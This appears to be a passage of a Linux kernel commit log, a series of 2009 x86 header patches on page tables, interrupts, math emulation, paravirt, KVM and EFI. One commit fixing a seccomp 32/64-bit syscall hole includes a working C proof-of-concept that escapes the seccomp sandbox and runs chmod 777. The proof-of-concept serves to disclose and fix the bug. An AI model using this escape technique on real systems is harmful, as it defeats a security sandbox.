From b534816b552d35bbd3c60702139ed5c7da2f55c2 Mon Sep 17 00:00:00 2001 From: Jeremy Fitzhardinge Date: Wed, 4 Feb 2009 18:33:38 -0800 Subject: x86: don't apply __supported_pte_mask to non-present ptes On an x86 system which doesn't support global mappings, __supported_pte_mask has _PAGE_GLOBAL clear, to make sure it never appears in the PTE. pfn_pte() and so on will enforce it with: static inline pte_t pfn_pte(unsigned long page_nr, pgprot_t pgprot) { return __pte((((phys_addr_t)page_nr << PAGE_SHIFT) | pgprot_val(pgprot)) & __supported_pte_mask); } However, we overload _PAGE_GLOBAL with _PAGE_PROTNONE on non-present ptes to distinguish them from swap entries. However, applying __supported_pte_mask indiscriminately will clear the bit and corrupt the pte. I guess the best fix is to only apply __supported_pte_mask to present ptes. This seems like the right solution to me, as it means we can completely ignore the issue of overlaps between the present pte bits and the non-present pte-as-swap entry use of the bits. __supported_pte_mask contains the set of flags we support on the current hardware. We also use bits in the pte for things like logically present ptes with no permissions, and swap entries for swapped out pages. We should only apply __supported_pte_mask to present ptes, because otherwise we may destroy other information being stored in the ptes. Signed-off-by: Jeremy Fitzhardinge Signed-off-by: H. Peter Anvin --- arch/x86/include/asm/pgtable.h | 26 ++++++++++++++++++++------ arch/x86/include/asm/xen/page.h | 2 +- 2 files changed, 21 insertions(+), 7 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/pgtable.h b/arch/x86/include/asm/pgtable.h index 06bbcbd66e9..4f5af8447d5 100644 --- a/arch/x86/include/asm/pgtable.h +++ b/arch/x86/include/asm/pgtable.h @@ -302,16 +302,30 @@ static inline pte_t pte_mkspecial(pte_t pte) extern pteval_t __supported_pte_mask; +/* + * Mask out unsupported bits in a present pgprot. Non-present pgprots + * can use those bits for other purposes, so leave them be. + */ +static inline pgprotval_t massage_pgprot(pgprot_t pgprot) +{ + pgprotval_t protval = pgprot_val(pgprot); + + if (protval & _PAGE_PRESENT) + protval &= __supported_pte_mask; + + return protval; +} + static inline pte_t pfn_pte(unsigned long page_nr, pgprot_t pgprot) { - return __pte((((phys_addr_t)page_nr << PAGE_SHIFT) | - pgprot_val(pgprot)) & __supported_pte_mask); + return __pte(((phys_addr_t)page_nr << PAGE_SHIFT) | + massage_pgprot(pgprot)); } static inline pmd_t pfn_pmd(unsigned long page_nr, pgprot_t pgprot) { - return __pmd((((phys_addr_t)page_nr << PAGE_SHIFT) | - pgprot_val(pgprot)) & __supported_pte_mask); + return __pmd(((phys_addr_t)page_nr << PAGE_SHIFT) | + massage_pgprot(pgprot)); } static inline pte_t pte_modify(pte_t pte, pgprot_t newprot) @@ -323,7 +337,7 @@ static inline pte_t pte_modify(pte_t pte, pgprot_t newprot) * the newprot (if present): */ val &= _PAGE_CHG_MASK; - val |= pgprot_val(newprot) & (~_PAGE_CHG_MASK) & __supported_pte_mask; + val |= massage_pgprot(newprot) & ~_PAGE_CHG_MASK; return __pte(val); } @@ -339,7 +353,7 @@ static inline pgprot_t pgprot_modify(pgprot_t oldprot, pgprot_t newprot) #define pte_pgprot(x) __pgprot(pte_flags(x) & PTE_FLAGS_MASK) -#define canon_pgprot(p) __pgprot(pgprot_val(p) & __supported_pte_mask) +#define canon_pgprot(p) __pgprot(massage_pgprot(p)) static inline int is_new_memtype_allowed(unsigned long flags, unsigned long new_flags) diff --git a/arch/x86/include/asm/xen/page.h b/arch/x86/include/asm/xen/page.h index 7ef617ef1df..4bd990ee43d 100644 --- a/arch/x86/include/asm/xen/page.h +++ b/arch/x86/include/asm/xen/page.h @@ -137,7 +137,7 @@ static inline pte_t mfn_pte(unsigned long page_nr, pgprot_t pgprot) pte_t pte; pte.pte = ((phys_addr_t)page_nr << PAGE_SHIFT) | - (pgprot_val(pgprot) & __supported_pte_mask); + massage_pgprot(pgprot); return pte; } -- cgit v1.2.3 From e736ad548db152776de61d7a26805cfae77ce5ce Mon Sep 17 00:00:00 2001 From: "Pallipadi, Venkatesh" Date: Fri, 6 Feb 2009 16:52:05 -0800 Subject: x86: add clflush before monitor for Intel 7400 series For Intel 7400 series CPUs, the recommendation is to use a clflush on the monitored address just before monitor and mwait pair [1]. This clflush makes sure that there are no false wakeups from mwait when the monitored address was recently written to. [1] "MONITOR/MWAIT Recommendations for Intel Xeon Processor 7400 series" section in specification update document of 7400 series http://download.intel.com/design/xeon/specupdt/32033601.pdf Signed-off-by: Venkatesh Pallipadi Signed-off-by: Ingo Molnar --- arch/x86/include/asm/cpufeature.h | 1 + 1 file changed, 1 insertion(+) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h index ea408dcba51..7301e60dc4a 100644 --- a/arch/x86/include/asm/cpufeature.h +++ b/arch/x86/include/asm/cpufeature.h @@ -93,6 +93,7 @@ #define X86_FEATURE_XTOPOLOGY (3*32+22) /* cpu topology enum extensions */ #define X86_FEATURE_TSC_RELIABLE (3*32+23) /* TSC is known to be reliable */ #define X86_FEATURE_NONSTOP_TSC (3*32+24) /* TSC does not stop in C states */ +#define X86_FEATURE_CLFLUSH_MONITOR (3*32+25) /* "" clflush reqd with monitor */ /* Intel-defined CPU features, CPUID level 0x00000001 (ecx), word 4 */ #define X86_FEATURE_XMM3 (4*32+ 0) /* "pni" SSE-3 */ -- cgit v1.2.3 From 3f4a739c6accd651a11fcf3c7a20ec8147c42660 Mon Sep 17 00:00:00 2001 From: Yinghai Lu Date: Sun, 8 Feb 2009 16:18:03 -0800 Subject: x86: find nr_irqs_gsi with mp_ioapic_routing Impact: find right nr_irqs_gsi on some systems. One test-system has gap between gsi's: [ 0.000000] ACPI: IOAPIC (id[0x04] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 4, version 0, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: IOAPIC (id[0x05] address[0xfeafd000] gsi_base[48]) [ 0.000000] IOAPIC[1]: apic_id 5, version 0, address 0xfeafd000, GSI 48-54 [ 0.000000] ACPI: IOAPIC (id[0x06] address[0xfeafc000] gsi_base[56]) [ 0.000000] IOAPIC[2]: apic_id 6, version 0, address 0xfeafc000, GSI 56-62 ... [ 0.000000] nr_irqs_gsi: 38 So nr_irqs_gsi is not right. some irq for MSI will overwrite with io_apic. need to get that with acpi_probe_gsi when acpi io_apic is used Signed-off-by: Yinghai Lu Signed-off-by: Ingo Molnar --- arch/x86/include/asm/mpspec.h | 6 ++++++ 1 file changed, 6 insertions(+) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/mpspec.h b/arch/x86/include/asm/mpspec.h index 62d14ce3cd0..bd22f2a3713 100644 --- a/arch/x86/include/asm/mpspec.h +++ b/arch/x86/include/asm/mpspec.h @@ -60,6 +60,7 @@ extern void mp_override_legacy_irq(u8 bus_irq, u8 polarity, u8 trigger, u32 gsi); extern void mp_config_acpi_legacy_irqs(void); extern int mp_register_gsi(u32 gsi, int edge_level, int active_high_low); +extern int acpi_probe_gsi(void); #ifdef CONFIG_X86_IO_APIC extern int mp_config_acpi_gsi(unsigned char number, unsigned int devfn, u8 pin, u32 gsi, int triggering, int polarity); @@ -71,6 +72,11 @@ mp_config_acpi_gsi(unsigned char number, unsigned int devfn, u8 pin, return 0; } #endif +#else /* !CONFIG_ACPI: */ +static inline int acpi_probe_gsi(void) +{ + return 0; +} #endif /* CONFIG_ACPI */ #define PHYSID_ARRAY_SIZE BITS_TO_LONGS(MAX_APICS) -- cgit v1.2.3 From 914c3d630b29b07d04908eab1b246812dadd5bd6 Mon Sep 17 00:00:00 2001 From: Tejun Heo Date: Mon, 9 Feb 2009 22:17:39 +0900 Subject: x86: include correct %gs in a.out core dump Impact: dump the correct %gs into a.out core dump aout_dump_thread() read %gs but didn't include it in core dump. Fix it. Signed-off-by: Tejun Heo Signed-off-by: Ingo Molnar --- arch/x86/include/asm/a.out-core.h | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/a.out-core.h b/arch/x86/include/asm/a.out-core.h index 37822206083..3c601f8224b 100644 --- a/arch/x86/include/asm/a.out-core.h +++ b/arch/x86/include/asm/a.out-core.h @@ -23,8 +23,6 @@ */ static inline void aout_dump_thread(struct pt_regs *regs, struct user *dump) { - u16 gs; - /* changed the size calculations - should hopefully work better. lbt */ dump->magic = CMAGIC; dump->start_code = 0; @@ -57,7 +55,7 @@ static inline void aout_dump_thread(struct pt_regs *regs, struct user *dump) dump->regs.ds = (u16)regs->ds; dump->regs.es = (u16)regs->es; dump->regs.fs = (u16)regs->fs; - savesegment(gs, gs); + savesegment(gs, dump->regs.gs); dump->regs.orig_ax = regs->orig_ax; dump->regs.ip = regs->ip; dump->regs.cs = (u16)regs->cs; -- cgit v1.2.3 From ae6af41f5a4841f06eb92bc86ad020ad44ae2a30 Mon Sep 17 00:00:00 2001 From: Tejun Heo Date: Mon, 9 Feb 2009 22:17:39 +0900 Subject: x86: math_emu info cleanup Impact: cleanup * Come on, struct info? s/struct info/struct math_emu_info/ * Use struct pt_regs and kernel_vm86_regs instead of defining its own register frame structure. Signed-off-by: Tejun Heo Signed-off-by: Ingo Molnar --- arch/x86/include/asm/math_emu.h | 29 ++++++++--------------------- arch/x86/include/asm/processor.h | 2 +- 2 files changed, 9 insertions(+), 22 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/math_emu.h b/arch/x86/include/asm/math_emu.h index 5a65b107ad5..302492c7795 100644 --- a/arch/x86/include/asm/math_emu.h +++ b/arch/x86/include/asm/math_emu.h @@ -1,31 +1,18 @@ #ifndef _ASM_X86_MATH_EMU_H #define _ASM_X86_MATH_EMU_H +#include +#include + /* This structure matches the layout of the data saved to the stack following a device-not-present interrupt, part of it saved automatically by the 80386/80486. */ -struct info { +struct math_emu_info { long ___orig_eip; - long ___ebx; - long ___ecx; - long ___edx; - long ___esi; - long ___edi; - long ___ebp; - long ___eax; - long ___ds; - long ___es; - long ___fs; - long ___orig_eax; - long ___eip; - long ___cs; - long ___eflags; - long ___esp; - long ___ss; - long ___vm86_es; /* This and the following only in vm86 mode */ - long ___vm86_ds; - long ___vm86_fs; - long ___vm86_gs; + union { + struct pt_regs regs; + struct kernel_vm86_regs vm86; + }; }; #endif /* _ASM_X86_MATH_EMU_H */ diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h index 091cd8855f2..3bfd5235a9e 100644 --- a/arch/x86/include/asm/processor.h +++ b/arch/x86/include/asm/processor.h @@ -353,7 +353,7 @@ struct i387_soft_struct { u8 no_update; u8 rm; u8 alimit; - struct info *info; + struct math_emu_info *info; u32 entry_eip; }; -- cgit v1.2.3 From a5ef7ca0e2636bad0ccd07b996d775348ae2b65e Mon Sep 17 00:00:00 2001 From: Kyle McMartin Date: Sun, 8 Feb 2009 17:39:58 -0500 Subject: x86: spinlocks: define dummy __raw_spin_is_contended Architectures other than mips and x86 are not using ticket spinlocks. Therefore, the contention on the lock is meaningless, since there is nobody known to be waiting on it (arguably /fairly/ unfair locks). Dummy it out to return 0 on other architectures. Signed-off-by: Kyle McMartin Acked-by: Ralf Baechle Acked-by: Ingo Molnar Signed-off-by: Linus Torvalds --- arch/x86/include/asm/paravirt.h | 1 + arch/x86/include/asm/spinlock.h | 1 + 2 files changed, 2 insertions(+) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/paravirt.h b/arch/x86/include/asm/paravirt.h index ba3e2ff6aed..c09a1412758 100644 --- a/arch/x86/include/asm/paravirt.h +++ b/arch/x86/include/asm/paravirt.h @@ -1402,6 +1402,7 @@ static inline int __raw_spin_is_contended(struct raw_spinlock *lock) { return PVOP_CALL1(int, pv_lock_ops.spin_is_contended, lock); } +#define __raw_spin_is_contended __raw_spin_is_contended static __always_inline void __raw_spin_lock(struct raw_spinlock *lock) { diff --git a/arch/x86/include/asm/spinlock.h b/arch/x86/include/asm/spinlock.h index d17c91981da..8247e94ac6b 100644 --- a/arch/x86/include/asm/spinlock.h +++ b/arch/x86/include/asm/spinlock.h @@ -245,6 +245,7 @@ static inline int __raw_spin_is_contended(raw_spinlock_t *lock) { return __ticket_spin_is_contended(lock); } +#define __raw_spin_is_contended __raw_spin_is_contended static __always_inline void __raw_spin_lock(raw_spinlock_t *lock) { -- cgit v1.2.3 From d315760ffa261c15ff92699ac6f514112543d7ca Mon Sep 17 00:00:00 2001 From: Tejun Heo Date: Mon, 9 Feb 2009 22:17:39 +0900 Subject: x86: fix math_emu register frame access do_device_not_available() is the handler for #NM and it declares that it takes a unsigned long and calls math_emu(), which takes a long argument and surprisingly expects the stack frame starting at the zero argument would match struct math_emu_info, which isn't true regardless of configuration in the current code. This patch makes do_device_not_available() take struct pt_regs like other exception handlers and initialize struct math_emu_info with pointer to it and pass pointer to the math_emu_info to math_emulate() like normal C functions do. This way, unless gcc makes a copy of struct pt_regs in do_device_not_available(), the register frame is correctly accessed regardless of kernel configuration or compiler used. This doesn't fix all math_emu problems but it at least gets it somewhat working. Signed-off-by: Tejun Heo Signed-off-by: Ingo Molnar --- arch/x86/include/asm/math_emu.h | 4 ++-- arch/x86/include/asm/traps.h | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/math_emu.h b/arch/x86/include/asm/math_emu.h index 302492c7795..031f6266f42 100644 --- a/arch/x86/include/asm/math_emu.h +++ b/arch/x86/include/asm/math_emu.h @@ -11,8 +11,8 @@ struct math_emu_info { long ___orig_eip; union { - struct pt_regs regs; - struct kernel_vm86_regs vm86; + struct pt_regs *regs; + struct kernel_vm86_regs *vm86; }; }; #endif /* _ASM_X86_MATH_EMU_H */ diff --git a/arch/x86/include/asm/traps.h b/arch/x86/include/asm/traps.h index 2ee0a3bceed..cf3bb053da0 100644 --- a/arch/x86/include/asm/traps.h +++ b/arch/x86/include/asm/traps.h @@ -41,7 +41,7 @@ dotraplinkage void do_int3(struct pt_regs *, long); dotraplinkage void do_overflow(struct pt_regs *, long); dotraplinkage void do_bounds(struct pt_regs *, long); dotraplinkage void do_invalid_op(struct pt_regs *, long); -dotraplinkage void do_device_not_available(struct pt_regs *, long); +dotraplinkage void do_device_not_available(struct pt_regs); dotraplinkage void do_coprocessor_segment_overrun(struct pt_regs *, long); dotraplinkage void do_invalid_TSS(struct pt_regs *, long); dotraplinkage void do_segment_not_present(struct pt_regs *, long); @@ -77,7 +77,7 @@ extern int panic_on_unrecovered_nmi; extern int kstack_depth_to_print; void math_error(void __user *); -asmlinkage void math_emulate(long); +void math_emulate(struct math_emu_info *); #ifdef CONFIG_X86_32 unsigned long patch_espfix_desc(unsigned long, unsigned long); #else -- cgit v1.2.3 From be03d9e8022030c16abf534e33e185bfc3d40eef Mon Sep 17 00:00:00 2001 From: Suresh Siddha Date: Wed, 11 Feb 2009 11:20:23 -0800 Subject: x86, pat: fix warn_on_once() while mapping 0-1MB range with /dev/mem Jeff Mahoney reported: > With Suse's hwinfo tool, on -tip: > WARNING: at arch/x86/mm/pat.c:637 reserve_pfn_range+0x5b/0x26d() reserve_pfn_range() is not tracking the memory range below 1MB as non-RAM and as such is inconsistent with similar checks in reserve_memtype() and free_memtype() Rename the pagerange_is_ram() to pat_pagerange_is_ram() and add the "track legacy 1MB region as non RAM" condition. And also, fix reserve_pfn_range() to return -EINVAL, when the pfn range is RAM. This is to be consistent with this API design. Reported-and-tested-by: Jeff Mahoney Signed-off-by: Suresh Siddha Signed-off-by: Venkatesh Pallipadi Signed-off-by: Ingo Molnar --- arch/x86/include/asm/page.h | 1 - 1 file changed, 1 deletion(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/page.h b/arch/x86/include/asm/page.h index e9873a2e869..776579119a0 100644 --- a/arch/x86/include/asm/page.h +++ b/arch/x86/include/asm/page.h @@ -57,7 +57,6 @@ typedef struct { pgdval_t pgd; } pgd_t; typedef struct { pgprotval_t pgprot; } pgprot_t; extern int page_is_ram(unsigned long pagenr); -extern int pagerange_is_ram(unsigned long start, unsigned long end); extern int devmem_is_allowed(unsigned long pagenr); extern void map_devmem(unsigned long pfn, unsigned long size, pgprot_t vma_prot); -- cgit v1.2.3 From d85cf93da66977dbc645352be1b2084a659d8a0b Mon Sep 17 00:00:00 2001 From: Jeremy Fitzhardinge Date: Thu, 12 Feb 2009 10:02:56 -0800 Subject: x86/paravirt: make arch_flush_lazy_mmu/cpu disable preemption Impact: avoid access to percpu vars in preempible context They are intended to be used whenever there's the possibility that there's some stale state which is going to be overwritten with a queued update, or to force a state change when we may be in lazy mode. Either way, we could end up calling it with preemption enabled, so wrap the functions in their own little preempt-disable section so they can be safely called in any context (though preemption should never be enabled if we're actually in a lazy state). (Move out of line to avoid #include dependencies.) Signed-off-by: Jeremy Fitzhardinge Signed-off-by: Thomas Gleixner --- arch/x86/include/asm/paravirt.h | 17 ++--------------- 1 file changed, 2 insertions(+), 15 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/paravirt.h b/arch/x86/include/asm/paravirt.h index ba3e2ff6aed..a660eceaa27 100644 --- a/arch/x86/include/asm/paravirt.h +++ b/arch/x86/include/asm/paravirt.h @@ -1352,14 +1352,7 @@ static inline void arch_leave_lazy_cpu_mode(void) PVOP_VCALL0(pv_cpu_ops.lazy_mode.leave); } -static inline void arch_flush_lazy_cpu_mode(void) -{ - if (unlikely(paravirt_get_lazy_mode() == PARAVIRT_LAZY_CPU)) { - arch_leave_lazy_cpu_mode(); - arch_enter_lazy_cpu_mode(); - } -} - +void arch_flush_lazy_cpu_mode(void); #define __HAVE_ARCH_ENTER_LAZY_MMU_MODE static inline void arch_enter_lazy_mmu_mode(void) @@ -1372,13 +1365,7 @@ static inline void arch_leave_lazy_mmu_mode(void) PVOP_VCALL0(pv_mmu_ops.lazy_mode.leave); } -static inline void arch_flush_lazy_mmu_mode(void) -{ - if (unlikely(paravirt_get_lazy_mode() == PARAVIRT_LAZY_MMU)) { - arch_leave_lazy_mmu_mode(); - arch_enter_lazy_mmu_mode(); - } -} +void arch_flush_lazy_mmu_mode(void); static inline void __set_fixmap(unsigned /* enum fixed_addresses */ idx, unsigned long phys, pgprot_t flags) -- cgit v1.2.3 From 7a0eb1960e8ddcb68ea631caf16815485af0e228 Mon Sep 17 00:00:00 2001 From: Avi Kivity Date: Mon, 19 Jan 2009 14:57:52 +0200 Subject: KVM: Avoid using CONFIG_ in userspace visible headers Kconfig symbols are not available in userspace, and are not stripped by headers-install. Avoid their use by adding #defines in to suit each architecture. Signed-off-by: Avi Kivity --- arch/x86/include/asm/kvm.h | 7 +++++++ 1 file changed, 7 insertions(+) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/kvm.h b/arch/x86/include/asm/kvm.h index d2e3bf3608a..886c9402ec4 100644 --- a/arch/x86/include/asm/kvm.h +++ b/arch/x86/include/asm/kvm.h @@ -9,6 +9,13 @@ #include #include +/* Select x86 specific features in */ +#define __KVM_HAVE_PIT +#define __KVM_HAVE_IOAPIC +#define __KVM_HAVE_DEVICE_ASSIGNMENT +#define __KVM_HAVE_MSI +#define __KVM_HAVE_USER_NMI + /* Architectural interrupt line count. */ #define KVM_NR_INTERRUPTS 256 -- cgit v1.2.3 From f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 Mon Sep 17 00:00:00 2001 From: KAMEZAWA Hiroyuki Date: Wed, 18 Feb 2009 14:48:32 -0800 Subject: mm: clean up for early_pfn_to_nid() What's happening is that the assertion in mm/page_alloc.c:move_freepages() is triggering: BUG_ON(page_zone(start_page) != page_zone(end_page)); Once I knew this is what was happening, I added some annotations: if (unlikely(page_zone(start_page) != page_zone(end_page))) { printk(KERN_ERR "move_freepages: Bogus zones: " "start_page[%p] end_page[%p] zone[%p]\n", start_page, end_page, zone); printk(KERN_ERR "move_freepages: " "start_zone[%p] end_zone[%p]\n", page_zone(start_page), page_zone(end_page)); printk(KERN_ERR "move_freepages: " "start_pfn[0x%lx] end_pfn[0x%lx]\n", page_to_pfn(start_page), page_to_pfn(end_page)); printk(KERN_ERR "move_freepages: " "start_nid[%d] end_nid[%d]\n", page_to_nid(start_page), page_to_nid(end_page)); ... And here's what I got: move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00] move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00] move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff] move_freepages: start_nid[1] end_nid[0] My memory layout on this box is: [ 0.000000] Zone PFN ranges: [ 0.000000] Normal 0x00000000 -> 0x0081ff5d [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[8] active PFN ranges [ 0.000000] 0: 0x00000000 -> 0x00020000 [ 0.000000] 1: 0x00800000 -> 0x0081f7ff [ 0.000000] 1: 0x0081f800 -> 0x0081fe50 [ 0.000000] 1: 0x0081fed1 -> 0x0081fed8 [ 0.000000] 1: 0x0081feda -> 0x0081fedb [ 0.000000] 1: 0x0081fedd -> 0x0081fee5 [ 0.000000] 1: 0x0081fee7 -> 0x0081ff51 [ 0.000000] 1: 0x0081ff59 -> 0x0081ff5d So it's a block move in that 0x81f600-->0x81f7ff region which triggers the problem. This patch: Declaration of early_pfn_to_nid() is scattered over per-arch include files, and it seems it's complicated to know when the declaration is used. I think it makes fix-for-memmap-init not easy. This patch moves all declaration to include/linux/mm.h After this, if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID -> Use static definition in include/linux/mm.h else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID -> Use generic definition in mm/page_alloc.c else -> per-arch back end function will be called. Signed-off-by: KAMEZAWA Hiroyuki Tested-by: KOSAKI Motohiro Reported-by: David Miller Cc: Mel Gorman Cc: Heiko Carstens Cc: [2.6.25.x, 2.6.26.x, 2.6.27.x, 2.6.28.x] Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- arch/x86/include/asm/mmzone_32.h | 2 -- arch/x86/include/asm/mmzone_64.h | 2 -- 2 files changed, 4 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/mmzone_32.h b/arch/x86/include/asm/mmzone_32.h index 07f1af494ca..105fb90a063 100644 --- a/arch/x86/include/asm/mmzone_32.h +++ b/arch/x86/include/asm/mmzone_32.h @@ -32,8 +32,6 @@ static inline void get_memcfg_numa(void) get_memcfg_numa_flat(); } -extern int early_pfn_to_nid(unsigned long pfn); - extern void resume_map_numa_kva(pgd_t *pgd); #else /* !CONFIG_NUMA */ diff --git a/arch/x86/include/asm/mmzone_64.h b/arch/x86/include/asm/mmzone_64.h index a5b3817d4b9..a29f48c2a32 100644 --- a/arch/x86/include/asm/mmzone_64.h +++ b/arch/x86/include/asm/mmzone_64.h @@ -40,8 +40,6 @@ static inline __attribute__((pure)) int phys_to_nid(unsigned long addr) #define node_end_pfn(nid) (NODE_DATA(nid)->node_start_pfn + \ NODE_DATA(nid)->node_spanned_pages) -extern int early_pfn_to_nid(unsigned long pfn); - #ifdef CONFIG_NUMA_EMU #define FAKE_NODE_MIN_SIZE (64 * 1024 * 1024) #define FAKE_NODE_MIN_HASH_MASK (~(FAKE_NODE_MIN_SIZE - 1UL)) -- cgit v1.2.3 From 4ab0d47d0ab311eb181532c1ecb6d02905685071 Mon Sep 17 00:00:00 2001 From: Venkatesh Pallipadi Date: Tue, 24 Feb 2009 17:35:12 -0800 Subject: gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t io_mapping_create_wc should take a resource_size_t parameter in place of unsigned long. With unsigned long, there will be no way to map greater than 4GB address in i386/32 bit. On x86, greater than 4GB addresses cannot be mapped on i386 without PAE. Return error for such a case. Patch also adds a structure for io_mapping, that saves the base, size and type on HAVE_ATOMIC_IOMAP archs, that can be used to verify the offset on io_mapping_map calls. Signed-off-by: Venkatesh Pallipadi Signed-off-by: Suresh Siddha Cc: Dave Airlie Cc: Jesse Barnes Cc: Eric Anholt Cc: Keith Packard Signed-off-by: Ingo Molnar --- arch/x86/include/asm/iomap.h | 3 +++ 1 file changed, 3 insertions(+) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/iomap.h b/arch/x86/include/asm/iomap.h index c1f06289b14..86af26091d6 100644 --- a/arch/x86/include/asm/iomap.h +++ b/arch/x86/include/asm/iomap.h @@ -23,6 +23,9 @@ #include #include +int +is_io_mapping_possible(resource_size_t base, unsigned long size); + void * iomap_atomic_prot_pfn(unsigned long pfn, enum km_type type, pgprot_t prot); -- cgit v1.2.3 From 5b1017404aea6d2e552e991b3fd814d839e9cd67 Mon Sep 17 00:00:00 2001 From: Roland McGrath Date: Fri, 27 Feb 2009 23:25:54 -0800 Subject: x86-64: seccomp: fix 32/64 syscall hole On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include #include #include #include #include #include #include int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: Roland McGrath [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: Linus Torvalds --- arch/x86/include/asm/seccomp_32.h | 6 ------ arch/x86/include/asm/seccomp_64.h | 8 -------- 2 files changed, 14 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/seccomp_32.h b/arch/x86/include/asm/seccomp_32.h index a6ad87b352c..b811d6f5780 100644 --- a/arch/x86/include/asm/seccomp_32.h +++ b/arch/x86/include/asm/seccomp_32.h @@ -1,12 +1,6 @@ #ifndef _ASM_X86_SECCOMP_32_H #define _ASM_X86_SECCOMP_32_H -#include - -#ifdef TIF_32BIT -#error "unexpected TIF_32BIT on i386" -#endif - #include #define __NR_seccomp_read __NR_read diff --git a/arch/x86/include/asm/seccomp_64.h b/arch/x86/include/asm/seccomp_64.h index 4171bb794e9..84ec1bd161a 100644 --- a/arch/x86/include/asm/seccomp_64.h +++ b/arch/x86/include/asm/seccomp_64.h @@ -1,14 +1,6 @@ #ifndef _ASM_X86_SECCOMP_64_H #define _ASM_X86_SECCOMP_64_H -#include - -#ifdef TIF_32BIT -#error "unexpected TIF_32BIT on x86_64" -#else -#define TIF_32BIT TIF_IA32 -#endif - #include #include -- cgit v1.2.3 From dd39ecf522ba86c70809715af46e6557f6491131 Mon Sep 17 00:00:00 2001 From: Huang Ying Date: Wed, 4 Mar 2009 10:58:33 +0800 Subject: x86: EFI: Back efi_ioremap with init_memory_mapping instead of FIX_MAP Impact: Fix boot failure on EFI system with large runtime memory range Brian Maly reported that some EFI system with large runtime memory range can not boot. Because the FIX_MAP used to map runtime memory range is smaller than run time memory range. This patch fixes this issue by re-implement efi_ioremap() with init_memory_mapping(). Reported-and-tested-by: Brian Maly Signed-off-by: Huang Ying Cc: Brian Maly Cc: Yinghai Lu LKML-Reference: <1236135513.6204.306.camel@yhuang-dev.sh.intel.com> Signed-off-by: Ingo Molnar --- arch/x86/include/asm/efi.h | 2 -- arch/x86/include/asm/fixmap_64.h | 4 ---- 2 files changed, 6 deletions(-) (limited to 'arch/x86/include') diff --git a/arch/x86/include/asm/efi.h b/arch/x86/include/asm/efi.h index ca5ffb2856b..edc90f23e70 100644 --- a/arch/x86/include/asm/efi.h +++ b/arch/x86/include/asm/efi.h @@ -37,8 +37,6 @@ extern unsigned long asmlinkage efi_call_phys(void *, ...); #else /* !CONFIG_X86_32 */ -#define MAX_EFI_IO_PAGES 100 - extern u64 efi_call0(void *fp); extern u64 efi_call1(void *fp, u64 arg1); extern u64 efi_call2(void *fp, u64 arg1, u64 arg2); diff --git a/arch/x86/include/asm/fixmap_64.h b/arch/x86/include/asm/fixmap_64.h index 00a30ab9b1a..8be740977db 100644 --- a/arch/x86/include/asm/fixmap_64.h +++ b/arch/x86/include/asm/fixmap_64.h @@ -16,7 +16,6 @@ #include #include #include -#include /* * Here we define all the compile-time 'special' virtual @@ -43,9 +42,6 @@ enum fixed_addresses { FIX_APIC_BASE, /* local (CPU) APIC) -- required for SMP or not */ FIX_IO_APIC_BASE_0, FIX_IO_APIC_BASE_END = FIX_IO_APIC_BASE_0 + MAX_IO_APICS - 1, - FIX_EFI_IO_MAP_LAST_PAGE, - FIX_EFI_IO_MAP_FIRST_PAGE = FIX_EFI_IO_MAP_LAST_PAGE - + 